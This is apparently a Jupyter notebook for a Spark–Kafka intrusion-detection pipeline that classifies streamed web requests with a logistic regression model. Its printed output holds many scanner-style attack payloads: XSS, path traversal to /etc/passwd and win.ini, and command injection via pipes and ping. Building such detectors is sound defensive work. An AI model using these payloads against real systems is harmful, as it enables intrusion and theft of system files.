# Requierments


In [ ]:
!pip install findspark
!pip install confluent-kafka
# Downloaded from https://mvnrepository.com/artifact/org.apache.spark/spark-streaming-kafka-0-8-assembly_2.11
# !wget https://repo1.maven.org/maven2/org/apache/spark/spark-streaming-kafka-0-8-assembly_2.11/2.4.0/spark-streaming-kafka-0-8-assembly_2.11-2.4.0.jar

In [1]:
import os
import findspark
findspark.init('/usr/local/spark/spark-2.4.0-bin-hadoop2.7')
os.environ['PYSPARK_SUBMIT_ARGS'] = '--jars spark-streaming-kafka-0-8-assembly_2.11-2.4.0.jar pyspark-shell'

---

In [2]:
from pyspark import SparkConf, SparkContext
# from operator import add
# import sys
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils
import pickle
from pyspark.mllib.feature import HashingTF, IDF, StandardScaler
from pyspark.mllib.classification import LogisticRegressionModel
from pyspark.mllib.linalg import Vectors

APP_NAME = "BigData"
sc = SparkContext(appName=APP_NAME)
ssc = StreamingContext(sc, 2)
sc

<SparkContext master=local[*] appName=BigData>

In [ ]:
with open('./data/hashedTF.pickle', 'rb') as f:
    hashingTF = pickle.load(f)
    
htfVectors = sc.textFile("./data/htfVectors").map(Vectors.parse)
idf = IDF().fit(htfVectors)

tfidf =  idf.transform(htfVectors)

scaler = StandardScaler().fit(tfidf)

model = LogisticRegressionModel.load(sc, "./models/Logistic_Regression")

In [3]:
topic = "test"
brokers = "localhost:9092"
kvs = KafkaUtils.createDirectStream(ssc, [topic], {"metadata.broker.list": brokers})


In [4]:
def to_ngram(payload_obj):
    n=2
    payload = str(payload_obj)
    ngrams = []
    for i in range(0,len(payload)-n+1):
        ngrams.append(payload[i:i+n])
    return ngrams


def get_prediction(line):
#     try:
        
    predictions = model.predict(scaler.transform(idf.transform(hashingTF.transform(line.collect()))))
    print(len(line.collect()), predictions)
#     except : 
#         print('---------------No data----------------')

def print_line(line):
    print(line.collect())

In [6]:
#lines = ssc.socketTextStream("localhost", 9092)
# ngrams = kvs.flatMap(lambda x : to_ngram(x))
# ngrams = kvs.flatMap(to_ngram)
# ngrams.foreachRDD(get_prediction)
kvs.foreachRDD(print_line)
ssc.start()
ssc.awaitTermination()  

[('myKey', '/6qbynt4f.asp?<img src="javascript:alert(cross_site_scripting.nasl);">\n'), ('myKey', '/jnv890lt.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">\n'), ('myKey', '/6qbynt4f.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">\n'), ('myKey', '/3hlysl2x.pl?<meta http-equiv=set-cookie content="testgjbe=8505">\n'), ('myKey', '/main.php?logout="ping;-w;11000;-n;1;4.3.2.1&rem;\n'), ('myKey', '/examples/jsp/cal/calendar_admin.pl?config=|cat /etc/passwd|\n'), ('myKey', '/cgi-bin/search.jsp?q=%"<script>alert(1332008604)</script>\n'), ('myKey', '/rtph263dumpscript/\n'), ('myKey', '/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=10nbpndw5e2ir1ncx\n'), ('myKey', '/cgi-bin/mlog.html?screen=/etc/passwd\n'), ('myKey', '/main.php?stuff="&ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n'), ('myKey', '/examples/jsp/jsp2/jspx/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n'), ('myKey', 

[('myKey', '/en-us/ddoworrl.asp?<script>document.cookie="testvlau=8517;"</script>\n'), ('myKey', '/javascript/resolution.exe\n'), ('myKey', '/examples/jsp/jsp2/jspx/include/sql.php?include_path=/etc/passwd\\x00\n'), ('myKey', '/scripts/vzdybnanqpc3.inc\n'), ('myKey', '/\\x80../\\x80../\\x80../\\x80../\\x80../\\x80../winnt/win.ini\n'), ('myKey', '/fcgi-bin/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n'), ('myKey', '/cgis/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n'), ('myKey', '/javascript/programs.exe\n'), ('myKey', '/help.php?q=&uname\\x09>q82939622\\x09#\n'), ('myKey', '/t3af3tdz.dll?<img src="javascript:alert(cross_site_scripting.nasl);">\n')]
[('myKey', '/scripts/index.php?board=nonexistant1419816536\n'), ('myKey', '/b5xdqgz2.php3?<img src="javascript:alert(cross_site_scripting.nasl);">\n'), ('myKey', '/bn857frh.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">\n'), ('myKey', '/s7qus4g3.cfm?<img src="javascript:alert(cross_site_scriptin

KeyboardInterrupt: 

In [ ]:
KafkaUtils.createDirectStream?